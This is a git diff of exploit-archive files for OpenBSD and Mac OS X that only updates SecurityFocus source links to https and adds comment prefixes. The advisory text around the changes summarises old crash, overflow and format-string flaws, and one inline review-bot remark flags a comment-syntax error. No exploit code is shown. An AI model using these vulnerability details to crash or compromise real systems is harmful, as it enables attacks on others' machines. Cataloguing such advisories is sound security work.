@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9073/info +// source: https://www.securityfocus.com/bid/9073/info A denial of service vulnerability has been reported for OpenBSD, specifically when handling malformed calls to sysctl. By invoking systcl and passing a specific flag in conjunction with a negative argument may trigger a kernel panic. This could be exploited by a malicious unprivileged local user to crash a target system. diff --git a/exploits/openbsd/dos/23392.c b/exploits/openbsd/dos/23392.c index be7b17929..b00d6713f 100644 --- a/exploits/openbsd/dos/23392.c +++ b/exploits/openbsd/dos/23392.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9086/info +// source: https://www.securityfocus.com/bid/9086/info A local OpenBSD kernel vulnerability has been discovered when handling the semctl and semop system calls. The problem specifically occurs due to improper sanity checking before handling a user-supplied semaphore set. It is said that this could lead to the corruption of kernel-based memory and may result in a kernel panic. diff --git a/exploits/openbsd/dos/24181.sh b/exploits/openbsd/dos/24181.sh index d7f0e018d..d8a657d0a 100755 --- a/exploits/openbsd/dos/24181.sh +++ b/exploits/openbsd/dos/24181.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10496/info +source: https://www.securityfocus.com/bid/10496/info It is reported that OpenBSD's isakmpd daemon is susceptible to a remote denial of service vulnerability. diff --git a/exploits/openbsd/local/20256.c b/exploits/openbsd/local/20256.c index 2af393785..75963cc7b 100644 --- a/exploits/openbsd/local/20256.c +++ b/exploits/openbsd/local/20256.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1746/info +// source: https://www.securityfocus.com/bid/1746/info fstat is a program shipped with BSD unix variants that is used to list the open files on a system. It is installed sgid kmem so it can access information about open files from the kernel memory structures. 
diff --git a/exploits/openbsd/local/21373.c b/exploits/openbsd/local/21373.c index 11d196dc4..75b71cd45 100644 --- a/exploits/openbsd/local/21373.c +++ b/exploits/openbsd/local/21373.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/4495/info +source: https://www.securityfocus.com/bid/4495/info OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information. diff --git a/exploits/openbsd/local/22210.txt b/exploits/openbsd/local/22210.txt index f63ca4b71..72f50311c 100644 --- a/exploits/openbsd/local/22210.txt +++ b/exploits/openbsd/local/22210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6748/info +source: https://www.securityfocus.com/bid/6748/info It has been reported that a problem with chpass included with OpenBSD may allow local users to gain access to the content of specific files. This vulnerability requires that lines in the target file be constructed in a specific format. This problem also affects the chfn and chsh programs which are hard links to the chpass binary. diff --git a/exploits/openbsd/local/23046.c b/exploits/openbsd/local/23046.c index 705c71b2c..b68e67ee4 100644 --- a/exploits/openbsd/local/23046.c +++ b/exploits/openbsd/local/23046.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8464/info +// source: https://www.securityfocus.com/bid/8464/info A vulnerability has been discovered in the OpenBSD semget() system call. The problem occurs due to insufficient sanity checks before allocating memory using the user-supplied nsems value as an argument. As a result, an attacker may be capable of modifying the running kernel. diff --git a/exploits/openbsd/local/23047.c b/exploits/openbsd/local/23047.c index dbe4a1d1c..14af505bc 100644 --- a/exploits/openbsd/local/23047.c +++ b/exploits/openbsd/local/23047.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8464/info +// source: https://www.securityfocus.com/bid/8464/info A vulnerability has been discovered in the OpenBSD semget() system call. The problem occurs due to insufficient sanity checks before allocating memory using the user-supplied nsems value as an argument. As a result, an attacker may be capable of modifying the running kernel. diff --git a/exploits/openbsd/local/29102.c b/exploits/openbsd/local/29102.c index e3fe5f7b3..2f7a39dd7 100644 --- a/exploits/openbsd/local/29102.c +++ b/exploits/openbsd/local/29102.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/21188/info +source: https://www.securityfocus.com/bid/21188/info OpenBSD is prone to a local vulnerability that may allow attackers to pass malicious environment variables to applications, bypassing expected security restrictions. diff --git a/exploits/openbsd/remote/20733.c b/exploits/openbsd/remote/20733.c index 0b524882d..153683e6d 100644 --- a/exploits/openbsd/remote/20733.c +++ b/exploits/openbsd/remote/20733.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2548/info +// source: https://www.securityfocus.com/bid/2548/info The BSD ftp daemon and derivatives (such as IRIX ftpd or the ftp daemon shipped with Kerberos 5) contain a number of buffer overflows that may lead to a compromise of root access to malicious users. diff --git a/exploits/openbsd/remote/22858.txt b/exploits/openbsd/remote/22858.txt index e21ad4335..bd64972b7 100644 --- a/exploits/openbsd/remote/22858.txt +++ b/exploits/openbsd/remote/22858.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8082/info +source: https://www.securityfocus.com/bid/8082/info OpenBSD PF is prone to an information leakage vulnerability when configured to redirect incoming traffic from standard ports to high ports. This occurs because PF responds different to packets destined for active private addresses than to those destined for inactive ones. This could be exploited to enumerate network resources for other network segments in preparation for further attacks. diff --git a/exploits/openbsd/remote/29725.py b/exploits/openbsd/remote/29725.py index 85b8a95cb..b90af8f78 100755 --- a/exploits/openbsd/remote/29725.py +++ b/exploits/openbsd/remote/29725.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22901/info +source: https://www.securityfocus.com/bid/22901/info OpenBSD is prone to a remote buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/osx/dos/20844.txt b/exploits/osx/dos/20844.txt index 0c70aa9dd..0758b47cb 100644 --- a/exploits/osx/dos/20844.txt +++ b/exploits/osx/dos/20844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2715/info +source: https://www.securityfocus.com/bid/2715/info Apple Personal Web Sharing is a utility that allows users to extend file-sharing abilities across a small intranet. It is shipped with MacOS 9. diff --git a/exploits/osx/dos/20845.txt b/exploits/osx/dos/20845.txt index b238cf464..206d479af 100644 --- a/exploits/osx/dos/20845.txt +++ b/exploits/osx/dos/20845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2716/info +source: https://www.securityfocus.com/bid/2716/info Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections. diff --git a/exploits/osx/dos/20922.txt b/exploits/osx/dos/20922.txt index cd2e46790..3b90f7116 100644 --- a/exploits/osx/dos/20922.txt +++ b/exploits/osx/dos/20922.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2864/info +source: https://www.securityfocus.com/bid/2864/info Rumpus FTP Server is an implementation for MacOS which allows file-sharing across TCP/IP connections. diff --git a/exploits/osx/dos/21234.sh b/exploits/osx/dos/21234.sh index f4eec0abc..492db8643 100755 --- a/exploits/osx/dos/21234.sh +++ b/exploits/osx/dos/21234.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3918/info +source: https://www.securityfocus.com/bid/3918/info Timbuktu is a remote administration tool. It is available for the Microsoft Window's family of operating systems and Power PC based Macintosh computers. It supports a variety of administrative tasks, including full remote access to the user's desktop. diff --git a/exploits/osx/dos/21275.c b/exploits/osx/dos/21275.c index fd01690ee..1cb1f46c1 100644 --- a/exploits/osx/dos/21275.c +++ b/exploits/osx/dos/21275.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4031/info +// source: https://www.securityfocus.com/bid/4031/info ICQ For MacOS X is a port of the popular Mirabilis ICQ client to the Apple MacOS X platform. It is freely available. diff --git a/exploits/osx/dos/22074.txt b/exploits/osx/dos/22074.txt index 7eee90814..f9a06797a 100644 --- a/exploits/osx/dos/22074.txt +++ b/exploits/osx/dos/22074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6331/info +source: https://www.securityfocus.com/bid/6331/info Mac OS X is the BSD-derived operating system distributed and maintained by Apple Sofware. diff --git a/exploits/osx/dos/22483.c b/exploits/osx/dos/22483.c index 2f8d9b24a..3d8594b9f 100644 --- a/exploits/osx/dos/22483.c +++ b/exploits/osx/dos/22483.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7323/info +// source: https://www.securityfocus.com/bid/7323/info MacOSX DirectoryService has been reported prone to a denial of service vulnerability. 
diff --git a/exploits/osx/dos/22629.txt b/exploits/osx/dos/22629.txt index e1309ca1f..3509107f4 100644 --- a/exploits/osx/dos/22629.txt +++ b/exploits/osx/dos/22629.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7659/info +source: https://www.securityfocus.com/bid/7659/info A vulnerability has been reported for Apple QuickTime/Darwin Streaming Server. The problem is said to occur within the QTSSReflector module while processing the ANNOUNCE command. Specifically, by specifying an extremely large value as an argument within an ANNOUNCE request, it is possible to trigger an unexpected calculation causing the server to crash. diff --git a/exploits/osx/dos/23442.txt b/exploits/osx/dos/23442.txt index 4d6b73679..acc622b18 100644 --- a/exploits/osx/dos/23442.txt +++ b/exploits/osx/dos/23442.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9228/info +source: https://www.securityfocus.com/bid/9228/info The cd9660.util utility has been reported prone to a local buffer overrun vulnerability. Excessive data supplied as an argument for the probe for mounting switch, passed to the cd9660.util utility will overrun the bounds of a reserved buffer in memory. Because memory adjacent to this buffer has been reported to contain saved values that are crucial to controlling execution flow, a local attacker may potentially influence cd9660.util execution flow into attacker-supplied instructions. diff --git a/exploits/osx/dos/23505.c b/exploits/osx/dos/23505.c index 8636ad1d6..78b764e30 100644 --- a/exploits/osx/dos/23505.c +++ b/exploits/osx/dos/23505.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9332/info +// source: https://www.securityfocus.com/bid/9332/info Apple MacOS X SecurityServer has been reported prone to a denial of service vulnerability that may be triggered by a local user. The issue may be triggered under certain circumstances when a large password for a SecKeychainUnlock() call is specified under certain circumstances. 
diff --git a/exploits/osx/dos/23793.txt b/exploits/osx/dos/23793.txt index 9893a2029..d0579b273 100644 --- a/exploits/osx/dos/23793.txt +++ b/exploits/osx/dos/23793.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9815/info +source: https://www.securityfocus.com/bid/9815/info Apple Safari Web Browser is reported to be prone to a security vulnerability related to handling of large JavaScript arrays (with 99999999999999999999999 or 0x23000000 elements). By declaring such an array and then attempting to access it, it may be possible to cause a browser crash. diff --git a/exploits/osx/dos/24780.html b/exploits/osx/dos/24780.html index 32a93efae..27526ddf4 100644 --- a/exploits/osx/dos/24780.html +++ b/exploits/osx/dos/24780.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11759/info +source: https://www.securityfocus.com/bid/11759/info Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs an infinite JavaScript array sort operation. It is conjectured that this will only result in a denial of service and is not further exploitable to execute arbitrary code, though this has not been confirmed. diff --git a/exploits/osx/dos/24843.txt b/exploits/osx/dos/24843.txt index fae172933..ac58c9b4e 100644 --- a/exploits/osx/dos/24843.txt +++ b/exploits/osx/dos/24843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11949/info +source: https://www.securityfocus.com/bid/11949/info A vulnerability has been identified in Apple Safari Web Browser that allows an attacker to misrepresent the status bar in the browser, allowing vulnerable users to be mislead into following a link to a malicious site. diff --git a/exploits/osx/dos/26128.html b/exploits/osx/dos/26128.html index e31ea61f7..b83fe8fc2 100644 --- a/exploits/osx/dos/26128.html +++ b/exploits/osx/dos/26128.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14528/info +source: https://www.securityfocus.com/bid/14528/info Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations. diff --git a/exploits/osx/dos/26271.txt b/exploits/osx/dos/26271.txt index ad9714497..bb1ff93ed 100644 --- a/exploits/osx/dos/26271.txt +++ b/exploits/osx/dos/26271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14868/info +source: https://www.securityfocus.com/bid/14868/info Apple Safari is prone to a memory corruption vulnerability. This issue is exposed when the browser opens specific 'data:' URIs, causing the browser to crash. diff --git a/exploits/osx/dos/26292.html b/exploits/osx/dos/26292.html index caa0f9cbd..0354920a7 100644 --- a/exploits/osx/dos/26292.html +++ b/exploits/osx/dos/26292.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14899/info +source: https://www.securityfocus.com/bid/14899/info Microsoft Internet Explorer for Mac OS is prone to a denial of service vulnerability. This issue occurs when Internet Explorer attempts to render a Web page with malformed content. diff --git a/exploits/osx/dos/26971.txt b/exploits/osx/dos/26971.txt index f92c2c6cc..a6f4e6fb1 100644 --- a/exploits/osx/dos/26971.txt +++ b/exploits/osx/dos/26971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16045/info +source: https://www.securityfocus.com/bid/16045/info Apple Mac OS X KHTMLParser is affected by a remote denial of service vulnerability. diff --git a/exploits/osx/dos/27714.txt b/exploits/osx/dos/27714.txt index f98c31420..8085c24f9 100644 --- a/exploits/osx/dos/27714.txt +++ b/exploits/osx/dos/27714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17634/info +source: https://www.securityfocus.com/bid/17634/info Apple Mac OS X is reported prone to multiple security vulnerabilities. 
diff --git a/exploits/osx/dos/27715.txt b/exploits/osx/dos/27715.txt index d36b70f5b..d4ebff305 100644 --- a/exploits/osx/dos/27715.txt +++ b/exploits/osx/dos/27715.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17634/info +source: https://www.securityfocus.com/bid/17634/info Apple Mac OS X is reported prone to multiple security vulnerabilities. diff --git a/exploits/osx/dos/27790.txt b/exploits/osx/dos/27790.txt index 5a3c53f0d..9376020a1 100644 --- a/exploits/osx/dos/27790.txt +++ b/exploits/osx/dos/27790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/17768/info +source: https://www.securityfocus.com/bid/17768/info ImageIO is susceptible to a remote denial-of-service vulnerability. This issue is do to a failure to properly process malicious OpenEXR image files. diff --git a/exploits/osx/dos/28135.pl b/exploits/osx/dos/28135.pl index e190014d3..068d9fb91 100755 --- a/exploits/osx/dos/28135.pl +++ b/exploits/osx/dos/28135.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18728/info +source: https://www.securityfocus.com/bid/18728/info Mac OS X Open Directory Server is prone to a denial-of-service vulnerability because it fails to handle exceptional conditions. diff --git a/exploits/osx/dos/28165.html b/exploits/osx/dos/28165.html index 55f13de31..1f02d4808 100644 --- a/exploits/osx/dos/28165.html +++ b/exploits/osx/dos/28165.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18822/info +source: https://www.securityfocus.com/bid/18822/info Apple Safari web browser is prone to a denial-of-service vulnerability when parsing certain malformed DHTML elements. diff --git a/exploits/osx/dos/28521.txt b/exploits/osx/dos/28521.txt index 8c46d20e5..f56777e7c 100644 --- a/exploits/osx/dos/28521.txt +++ b/exploits/osx/dos/28521.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/19976/info +source: https://www.securityfocus.com/bid/19976/info Apple QuickTime is prone to multiple vulnerabilities because it fails to properly bounds-check and sanitize user-supplied data. diff --git a/exploits/osx/dos/28578.txt b/exploits/osx/dos/28578.txt index 2cb026848..85c3db42c 100644 --- a/exploits/osx/dos/28578.txt +++ b/exploits/osx/dos/28578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20034/info +source: https://www.securityfocus.com/bid/20034/info Apple Mac OS X kextload is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied data before copying it to a finite-sized memory buffer. diff --git a/exploits/osx/dos/28948.c b/exploits/osx/dos/28948.c index da63317e7..05818de82 100644 --- a/exploits/osx/dos/28948.c +++ b/exploits/osx/dos/28948.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20982/info +// source: https://www.securityfocus.com/bid/20982/info Apple Mac OS X is prone to a local denial-of-service vulnerability because the kernel fails to properly handle the execution of a system call. diff --git a/exploits/osx/dos/29007.html b/exploits/osx/dos/29007.html index 92259ca40..ea8242942 100644 --- a/exploits/osx/dos/29007.html +++ b/exploits/osx/dos/29007.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21053/info +source: https://www.securityfocus.com/bid/21053/info Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code. diff --git a/exploits/osx/dos/29144.txt b/exploits/osx/dos/29144.txt index a5946a1f8..c594cf04b 100644 --- a/exploits/osx/dos/29144.txt +++ b/exploits/osx/dos/29144.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21201/info +source: https://www.securityfocus.com/bid/21201/info Apple Mac OS X is prone to a remote denial-of-service vulnerability when handling specially crafted UDIF disk image files. 
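Review bot: in exploits/osx/dos/28948.c the added `// source:` prefix comments out line 1 only; the unchanged context line after it ("Apple Mac OS X is prone to a local denial-of-service vulnerability ...") is still bare prose at file scope, which a C compiler rejects. Wrap the whole advisory header in a block comment, as exploits/osx/local/25055.c already does with its leading `/*`, so that the header as a whole is a comment and not just its first line.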
diff --git a/exploits/osx/dos/29161.txt b/exploits/osx/dos/29161.txt index 2b46b83be..f428b4291 100644 --- a/exploits/osx/dos/29161.txt +++ b/exploits/osx/dos/29161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21236/info +source: https://www.securityfocus.com/bid/21236/info Apple Mac OS X is prone to a remote denial-of-service vulnerability when handling specially crafted UDTO disk image files. diff --git a/exploits/osx/dos/29441.txt b/exploits/osx/dos/29441.txt index 35262f103..4486c49f1 100644 --- a/exploits/osx/dos/29441.txt +++ b/exploits/osx/dos/29441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21993/info +source: https://www.securityfocus.com/bid/21993/info Apple Mac OS X is prone to a remote integer-overflow vulnerability. This issue occurs when the UFS filesystem handler fails to handle specially crafted DMG images. diff --git a/exploits/osx/dos/29452.txt b/exploits/osx/dos/29452.txt index fc5146d22..debfdb187 100644 --- a/exploits/osx/dos/29452.txt +++ b/exploits/osx/dos/29452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22036/info +source: https://www.securityfocus.com/bid/22036/info Apple Mac OS X is prone to a remote denial-of-service vulnerability. This issue occurs when the UFS filesystem handler fails to handle specially crafted DMG images. diff --git a/exploits/osx/dos/29454.txt b/exploits/osx/dos/29454.txt index 915dd973f..1fa97c06a 100644 --- a/exploits/osx/dos/29454.txt +++ b/exploits/osx/dos/29454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22042/info +source: https://www.securityfocus.com/bid/22042/info Apple Mac OS X is prone to a denial-of-service vulnerability when handling a DMG image containing a specially crafted HFS+ filesystem. diff --git a/exploits/osx/dos/29461.txt b/exploits/osx/dos/29461.txt index f32ccd902..780d00d0e 100644 --- a/exploits/osx/dos/29461.txt +++ b/exploits/osx/dos/29461.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22059/info +source: https://www.securityfocus.com/bid/22059/info Apple WebKit is prone to a denial-of-service vulnerability. diff --git a/exploits/osx/dos/29509.txt b/exploits/osx/dos/29509.txt index 0c53e310c..d34964bb9 100644 --- a/exploits/osx/dos/29509.txt +++ b/exploits/osx/dos/29509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22207/info +source: https://www.securityfocus.com/bid/22207/info Mac OS X QuickDraw is prone to a remote memory-corruption vulnerability because the software fails to properly handle malformed PICT image files. diff --git a/exploits/osx/dos/29523.txt b/exploits/osx/dos/29523.txt index 771819fdb..0a4653888 100644 --- a/exploits/osx/dos/29523.txt +++ b/exploits/osx/dos/29523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22222/info +source: https://www.securityfocus.com/bid/22222/info Apple Software Update is prone to a format-string vulnerability. diff --git a/exploits/osx/dos/29532.txt b/exploits/osx/dos/29532.txt index c5f8d2324..6430bf052 100644 --- a/exploits/osx/dos/29532.txt +++ b/exploits/osx/dos/29532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22272/info +source: https://www.securityfocus.com/bid/22272/info Apple Installer is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/osx/dos/29535.txt b/exploits/osx/dos/29535.txt index 9ed87101d..5dd5ce420 100644 --- a/exploits/osx/dos/29535.txt +++ b/exploits/osx/dos/29535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22286/info +source: https://www.securityfocus.com/bid/22286/info Flip4Mac is prone to a remote memory-corruption vulnerability. diff --git a/exploits/osx/dos/29551.txt b/exploits/osx/dos/29551.txt index ad834b959..b1129b7e7 100644 --- a/exploits/osx/dos/29551.txt +++ b/exploits/osx/dos/29551.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29553.txt b/exploits/osx/dos/29553.txt index aea6de871..bbfbb25dd 100644 --- a/exploits/osx/dos/29553.txt +++ b/exploits/osx/dos/29553.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29554.txt b/exploits/osx/dos/29554.txt index 28149ae23..6452a4f04 100644 --- a/exploits/osx/dos/29554.txt +++ b/exploits/osx/dos/29554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29555.txt b/exploits/osx/dos/29555.txt index 7739f3fbf..c38a8063f 100644 --- a/exploits/osx/dos/29555.txt +++ b/exploits/osx/dos/29555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22326/info +source: https://www.securityfocus.com/bid/22326/info Multiple products for Mac OS X are prone to multiple remote format-string vulnerabilities. The affected applications include Help Viewer, Safari, iPhoto, and iMovie. diff --git a/exploits/osx/dos/29616.xml b/exploits/osx/dos/29616.xml index c720d09e7..b5f7e3e6d 100644 --- a/exploits/osx/dos/29616.xml +++ b/exploits/osx/dos/29616.xml 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22615/info +source: https://www.securityfocus.com/bid/22615/info Apple iTunes is prone to a remote denial-of-service vulnerability because the application fails to handle malformed XML playlist files. diff --git a/exploits/osx/dos/29620.txt b/exploits/osx/dos/29620.txt index 4b2b548e9..deac41de8 100644 --- a/exploits/osx/dos/29620.txt +++ b/exploits/osx/dos/29620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22630/info +source: https://www.securityfocus.com/bid/22630/info Apple Mac OS X ImageIO is prone to an integer-overflow vulnerability because it fails to handle specially crafted image files. diff --git a/exploits/osx/dos/31021.html b/exploits/osx/dos/31021.html index 4f0880557..172dfa352 100644 --- a/exploits/osx/dos/31021.html +++ b/exploits/osx/dos/31021.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27261/info +source: https://www.securityfocus.com/bid/27261/info Apple Safari is prone to a remote denial-of-service vulnerability. diff --git a/exploits/osx/dos/31619.ics b/exploits/osx/dos/31619.ics index 098c193bd..b937a5d37 100644 --- a/exploits/osx/dos/31619.ics +++ b/exploits/osx/dos/31619.ics @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28632/info +source: https://www.securityfocus.com/bid/28632/info Apple iCal is prone to a denial-of-service vulnerability because it fails to handle specially crafted files. diff --git a/exploits/osx/dos/31620.ics b/exploits/osx/dos/31620.ics index 0e29a5e8a..ee1fdd3b4 100644 --- a/exploits/osx/dos/31620.ics +++ b/exploits/osx/dos/31620.ics @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28633/info +source: https://www.securityfocus.com/bid/28633/info Apple iCal is prone to a denial-of-service vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/osx/dos/32136.html b/exploits/osx/dos/32136.html index 86daeda5e..8978de54d 100644 --- a/exploits/osx/dos/32136.html 
+++ b/exploits/osx/dos/32136.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30488/info +source: https://www.securityfocus.com/bid/30488/info Apple Mac OS X is prone to multiple memory-corruption vulnerabilities that affect the CoreGraphics component. diff --git a/exploits/osx/dos/32694.pl b/exploits/osx/dos/32694.pl index b1d6fb3bd..8096c709d 100755 --- a/exploits/osx/dos/32694.pl +++ b/exploits/osx/dos/32694.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33080/info +source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. diff --git a/exploits/osx/dos/32695.php b/exploits/osx/dos/32695.php index 1f46c0007..ffd4b3830 100644 --- a/exploits/osx/dos/32695.php +++ b/exploits/osx/dos/32695.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33080/info +source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. diff --git a/exploits/osx/dos/32817.txt b/exploits/osx/dos/32817.txt index 9d1dd59e4..30f9550f7 100644 --- a/exploits/osx/dos/32817.txt +++ b/exploits/osx/dos/32817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33909/info +source: https://www.securityfocus.com/bid/33909/info Apple Safari is prone to a denial-of-service vulnerability that stems from a NULL-pointer dereference. diff --git a/exploits/osx/dos/33235.rb b/exploits/osx/dos/33235.rb index c198b6524..babdfa7d1 100755 --- a/exploits/osx/dos/33235.rb +++ b/exploits/osx/dos/33235.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36478/info +source: https://www.securityfocus.com/bid/36478/info Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. diff --git a/exploits/osx/dos/33337.c b/exploits/osx/dos/33337.c index 721350518..a8fa29fef 100644 
--- a/exploits/osx/dos/33337.c +++ b/exploits/osx/dos/33337.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36915/info +// source: https://www.securityfocus.com/bid/36915/info Apple Mac OS X is prone to a local denial-of-service vulnerability that is caused by a race condition. diff --git a/exploits/osx/dos/33479.c b/exploits/osx/dos/33479.c index 255c6fdbe..574bfbfc0 100644 --- a/exploits/osx/dos/33479.c +++ b/exploits/osx/dos/33479.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37687/info +// source: https://www.securityfocus.com/bid/37687/info Mac OS X is prone to a memory-corruption vulnerability because the software fails to properly bounds-check data used as an array index. diff --git a/exploits/osx/dos/36271.py b/exploits/osx/dos/36271.py index 6bfd25938..f9700a5d2 100755 --- a/exploits/osx/dos/36271.py +++ b/exploits/osx/dos/36271.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50446/info +source: https://www.securityfocus.com/bid/50446/info Apple Mac OS X and iOS are prone to a denial-of-service vulnerability. diff --git a/exploits/osx/local/19244.sh b/exploits/osx/local/19244.sh index 7d250748c..27774d856 100755 --- a/exploits/osx/local/19244.sh +++ b/exploits/osx/local/19244.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/306/info +source: https://www.securityfocus.com/bid/306/info A vulnerability in the MacOS X Server may crash it while under heavy load. diff --git a/exploits/osx/local/19417.txt b/exploits/osx/local/19417.txt index 4a8c90104..6dfcf5343 100644 --- a/exploits/osx/local/19417.txt +++ b/exploits/osx/local/19417.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/519/info +source: https://www.securityfocus.com/bid/519/info The encryption algorithm in MacOS system is simple and the password can be easily decoded. diff --git a/exploits/osx/local/19427.txt b/exploits/osx/local/19427.txt index 5df0e7173..07a8ddf7c 100644 --- a/exploits/osx/local/19427.txt 
+++ b/exploits/osx/local/19427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/531/info +source: https://www.securityfocus.com/bid/531/info At Ease 5.0 will allow a user to access any user's volume on the server through a web browser. diff --git a/exploits/osx/local/19434.txt b/exploits/osx/local/19434.txt index 7d04e0e4b..7c8f1eed9 100644 --- a/exploits/osx/local/19434.txt +++ b/exploits/osx/local/19434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/546/info +source: https://www.securityfocus.com/bid/546/info Internet Config is a third-party freeware utility for MacOS. It provides a means of centralizing frequently-required connection information, including passwords, for use by several programs. The passwords are stored in encrypted form in the Internet Preferences file in the Preferences folder. The encryption algorithm used is weak and easily broken. diff --git a/exploits/osx/local/19437.txt b/exploits/osx/local/19437.txt index 202c6221e..674741eaa 100644 --- a/exploits/osx/local/19437.txt +++ b/exploits/osx/local/19437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/551/info +source: https://www.securityfocus.com/bid/551/info Screen to Screen is a remote control utility for systems runnig MacOS. To use it, you need to have an administrator password. This password is stored in encrypted form in a file called "Authorization" located in the System Folder under Preferences:Power On Preferences:Screen To Screen. diff --git a/exploits/osx/local/19438.txt b/exploits/osx/local/19438.txt index 58ddca58e..22c1acb85 100644 --- a/exploits/osx/local/19438.txt +++ b/exploits/osx/local/19438.txt 
